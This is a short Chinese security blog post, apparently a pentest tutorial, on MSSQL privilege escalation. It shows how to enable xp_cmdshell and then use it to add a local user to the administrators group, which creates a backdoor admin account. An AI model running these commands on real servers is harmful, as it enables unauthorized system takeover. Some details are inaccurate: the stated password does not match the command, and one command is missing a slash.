MSSQL提权之xp_cmdshell

发表于 | 更新于 | 分类于 | 热度:
本文字数: 609 | 阅读时长 ≈ 1 分钟

0x01 前提

  1. getshell或者存在sql注入并且能够执行命令。

  2. sql server是system权限,sql server默认就是system权限。

0x02 xp_cmdshell

有了xp_cmdshell的话可以执行系统命令,该组件默认是关闭的,因此需要把它打开。

开启xp_cmdshell

1
2
exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;

关闭xp_cmdshell

1
2
exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell', 0;reconfigure

0x03 提权

1
2
exec master..xp_cmdshell 'net user test pinohd123. /add'    添加用户test,密码test
exec master..xp_cmdshell 'net localgroup administrators test add'    添加test用户到管理员组

本文标题:MSSQL提权之xp_cmdshell

文章作者:Pino-HD

发布时间:2018年06月10日 - 15:06

最后更新:2018年06月20日 - 11:06

原始链接:https://pino-hd.github.io/2018/06/10/MSSQL提权之xp-cmdshell/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

坚持原创技术分享,您的支持将鼓励我继续创作!